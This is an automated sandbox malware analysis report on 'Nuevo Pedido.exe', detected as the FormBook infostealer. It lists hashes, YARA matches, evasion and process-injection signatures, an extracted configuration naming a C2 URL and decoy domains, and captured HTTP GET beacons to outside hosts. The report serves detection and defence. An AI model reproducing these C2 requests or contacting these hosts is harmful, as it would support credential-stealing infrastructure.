Windows Analysis Report Nuevo Pedido.exe

Overview

General Information

Sample Name: Nuevo Pedido.exe
Analysis ID: 528617
MD5: 159c46c59cd8ecb7a2bce707de1bc370
SHA1: e76f6dc42b06e706b6ce49cf6c95c9eaabfc9334
SHA256: 7f91403a34cde3f8a1d3a30a2cec9abfb30f5f7eb52f777af78fa0d34f7a27f9
Tags: exeFormbookxloader
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.spoiledzone.com/udeh/"], "decoy": ["pimpyoursmile.com", "mibikeshops.com", "blueprintroslyn.com", "onlinedatingthaiweb.com", "filmweltruhr.com", "apprigutimaunrpgroup.com", "prolineautoservices.com", "thejohnmatt.com", "predialisbolivia.com", "pittsburghdata.center", "janeflwr.com", "usxigroup.com", "canurfaliogli.net", "securebankofamericalog.site", "concernedclimatecitizen.com", "756256.xyz", "blaclyteproductions.com", "chaturey.com", "mesoftbilisim.com", "crochetastitch.com", "biggirlrantz.com", "trenddoffical.com", "eureka.quest", "syuanbao.com", "auspicious.tech", "mypc.host", "hemeishun.com", "3973rollingvalleydrive.com", "lovebydarius.store", "z1liner.com", "pspoint.com", "skincell-advanced.website", "937281.com", "mygranitepro.com", "masterlotz.com", "electricidadygasmx.com", "mmcyxx.com", "fixmetech.com", "teesworkshop.com", "topshelfbudshop.com", "ccnet.club", "myfranciscanshoe.com", "kyrstensinema2024.com", "selectioncoeur.com", "nrgd1.club", "qzttb.net", "ouidles.com", "royaldears.com", "downingmunroe.online", "seawooenc.com", "flagfootballcoaches.com", "tremblock.com", "finsits.com", "rcepjobs.com", "web-control.biz", "notvaccinatedjobs.com", "glueandstack.com", "modularbuildingsolutions.net", "sosibibyslot.website", "dragonmodz.net", "turkishdelightday.xyz", "dentalhealth24.com", "celtabet153.xyz", "pigsandbees.com"]}
Multi AV Scanner detection for submitted file
Source: Nuevo Pedido.exe Virustotal: Detection: 32% Perma Link
Source: Nuevo Pedido.exe ReversingLabs: Detection: 33%
Yara detected FormBook
Source: Yara match File source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORY
Antivirus or Machine Learning detection for unpacked file
Source: 3.0.Nuevo Pedido.exe.400000.8.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.2.Nuevo Pedido.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.0.Nuevo Pedido.exe.400000.4.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.0.Nuevo Pedido.exe.400000.6.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

barindex
Uses 32bit PE files
Source: Nuevo Pedido.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Nuevo Pedido.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: cscript.pdbUGP source: Nuevo Pedido.exe, 00000003.00000002.309749696.0000000003460000.00000040.00020000.sdmp, Nuevo Pedido.exe, 00000003.00000002.304821141.0000000001559000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdbUGP source: Nuevo Pedido.exe, 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Nuevo Pedido.exe, 00000003.00000002.308818280.0000000001AAF000.00000040.00000001.sdmp, cscript.exe, 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp, cscript.exe, 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: Nuevo Pedido.exe, Nuevo Pedido.exe, 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Nuevo Pedido.exe, 00000003.00000002.308818280.0000000001AAF000.00000040.00000001.sdmp, cscript.exe, cscript.exe, 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp, cscript.exe, 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp
Source: Binary string: cscript.pdb source: Nuevo Pedido.exe, 00000003.00000002.309749696.0000000003460000.00000040.00020000.sdmp, Nuevo Pedido.exe, 00000003.00000002.304821141.0000000001559000.00000004.00000020.sdmp

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 4x nop then pop edi 3_2_00415660
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 4x nop then pop esi 3_2_004157D8
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 4x nop then pop esi 3_2_004157AA
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4x nop then pop edi 16_2_00615660
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4x nop then pop esi 16_2_006157D8
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4x nop then pop esi 16_2_006157AA

Networking:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.rcepjobs.com
Source: C:\Windows\explorer.exe Domain query: www.sosibibyslot.website
Source: C:\Windows\explorer.exe Network Connect: 185.53.179.91 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.tremblock.com
Source: C:\Windows\explorer.exe Domain query: www.securebankofamericalog.site
Source: C:\Windows\explorer.exe Domain query: www.thejohnmatt.com
Source: C:\Windows\explorer.exe Network Connect: 3.64.163.50 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.blueprintroslyn.com
Source: C:\Windows\explorer.exe Domain query: www.onlinedatingthaiweb.com
Source: C:\Windows\explorer.exe Network Connect: 192.232.250.147 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 185.53.178.53 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.downingmunroe.online
Source: C:\Windows\explorer.exe Network Connect: 209.17.116.163 80 Jump to behavior
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.spoiledzone.com/udeh/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TEAMINTERNET-ASDE TEAMINTERNET-ASDE
Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /udeh/?2dYxhfjx=E9wG6DB+gJGrCrA7N2npAfbzd/MNcvRP0YSWLCgDnz2mMEe2tMuLmGDUaa3MX32MwTcI&s6AD=5jltOBY8-rN HTTP/1.1Host: www.tremblock.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /udeh/?2dYxhfjx=Sh2Frx7Ne5Gbf0GZF0aHN0EyZlj99LhHOr4v0jLu0VOTkpyLoQ3tHVxja8cQ+qoaRshC&s6AD=5jltOBY8-rN HTTP/1.1Host: www.rcepjobs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /udeh/?2dYxhfjx=XsaaYVs5B+09RIkVBuB9uz7A4nUjKuiPTgX8t5JQ0XDGnKq9QQr8GjRKS5XBt9MDEtTg&s6AD=5jltOBY8-rN HTTP/1.1Host: www.downingmunroe.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /udeh/?2dYxhfjx=ov0JDamFDTMX/NINQ6dXBWp9D4Bna97YEIhf43toIE+QttJEvvSyuVruiBSF6Ny2F/6R&s6AD=5jltOBY8-rN HTTP/1.1Host: www.thejohnmatt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /udeh/?2dYxhfjx=WESqUOlrd4N7F4Vkh8SPM0KezyJ+WDn1u3Qqm333AtEi2E+6MV6LR8TxaNrvEi0KysNf&s6AD=5jltOBY8-rN HTTP/1.1Host: www.onlinedatingthaiweb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 3.64.163.50 3.64.163.50
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 25 Nov 2021 14:10:30 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 25 Nov 2021 14:11:10 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: Nuevo Pedido.exe, 00000000.00000002.241689369.0000000002E3A000.00000004.00000001.sdmp, Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: cscript.exe, 00000010.00000002.508075136.0000000004E02000.00000004.00020000.sdmp String found in binary or memory: http://www.rcepjobs.com
Source: unknown DNS traffic detected: queries for: www.tremblock.com
Source: global traffic HTTP traffic detected: GET /udeh/?2dYxhfjx=E9wG6DB+gJGrCrA7N2npAfbzd/MNcvRP0YSWLCgDnz2mMEe2tMuLmGDUaa3MX32MwTcI&s6AD=5jltOBY8-rN HTTP/1.1Host: www.tremblock.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /udeh/?2dYxhfjx=Sh2Frx7Ne5Gbf0GZF0aHN0EyZlj99LhHOr4v0jLu0VOTkpyLoQ3tHVxja8cQ+qoaRshC&s6AD=5jltOBY8-rN HTTP/1.1Host: www.rcepjobs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /udeh/?2dYxhfjx=XsaaYVs5B+09RIkVBuB9uz7A4nUjKuiPTgX8t5JQ0XDGnKq9QQr8GjRKS5XBt9MDEtTg&s6AD=5jltOBY8-rN HTTP/1.1Host: www.downingmunroe.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /udeh/?2dYxhfjx=ov0JDamFDTMX/NINQ6dXBWp9D4Bna97YEIhf43toIE+QttJEvvSyuVruiBSF6Ny2F/6R&s6AD=5jltOBY8-rN HTTP/1.1Host: www.thejohnmatt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /udeh/?2dYxhfjx=WESqUOlrd4N7F4Vkh8SPM0KezyJ+WDn1u3Qqm333AtEi2E+6MV6LR8TxaNrvEi0KysNf&s6AD=5jltOBY8-rN HTTP/1.1Host: www.onlinedatingthaiweb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Uses 32bit PE files
Source: Nuevo Pedido.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
